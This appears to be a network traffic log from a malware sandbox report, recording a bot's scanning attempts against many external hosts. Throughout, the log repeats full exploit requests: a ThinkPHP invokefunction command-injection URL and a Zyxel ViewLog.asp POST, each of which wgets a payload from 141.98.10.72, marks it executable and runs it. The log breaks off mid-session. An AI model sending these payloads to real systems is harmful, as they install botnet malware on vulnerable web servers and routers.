                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27192.168.2.144459488.216.146.2280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:46.483753920 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:46.707462072 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:32:46 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28192.168.2.145564888.247.113.380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:46.507239103 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:46.754995108 CET101INHTTP/1.1 404 Not Found
                                                        Content-type: text/html
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29192.168.2.144854494.123.124.618080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:47.069192886 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30192.168.2.145550094.120.48.08080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:47.069242954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31192.168.2.145379695.161.194.948080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:47.069258928 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:48.393728018 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32192.168.2.146057695.167.7.908080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:47.109616995 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:47.411389112 CET490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:32:46 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33192.168.2.145529894.121.70.2438080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:47.662506104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34192.168.2.144623295.209.143.838080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:47.672394991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35192.168.2.144473431.136.90.418080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:48.021073103 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:51.177665949 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:57.321377993 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:09.352880955 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:33.671917915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:22.821873903 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36192.168.2.145167631.136.118.488080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:48.038891077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:51.177741051 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:57.321376085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:09.352864981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:33.671936989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:22.821872950 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37192.168.2.144913294.123.19.108080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:48.067142963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        38192.168.2.143750431.136.213.1248080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:48.275932074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:51.433643103 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:57.577383041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:09.608860016 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:33.671951056 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:22.821866035 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        39192.168.2.143512831.136.249.1158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:48.279431105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
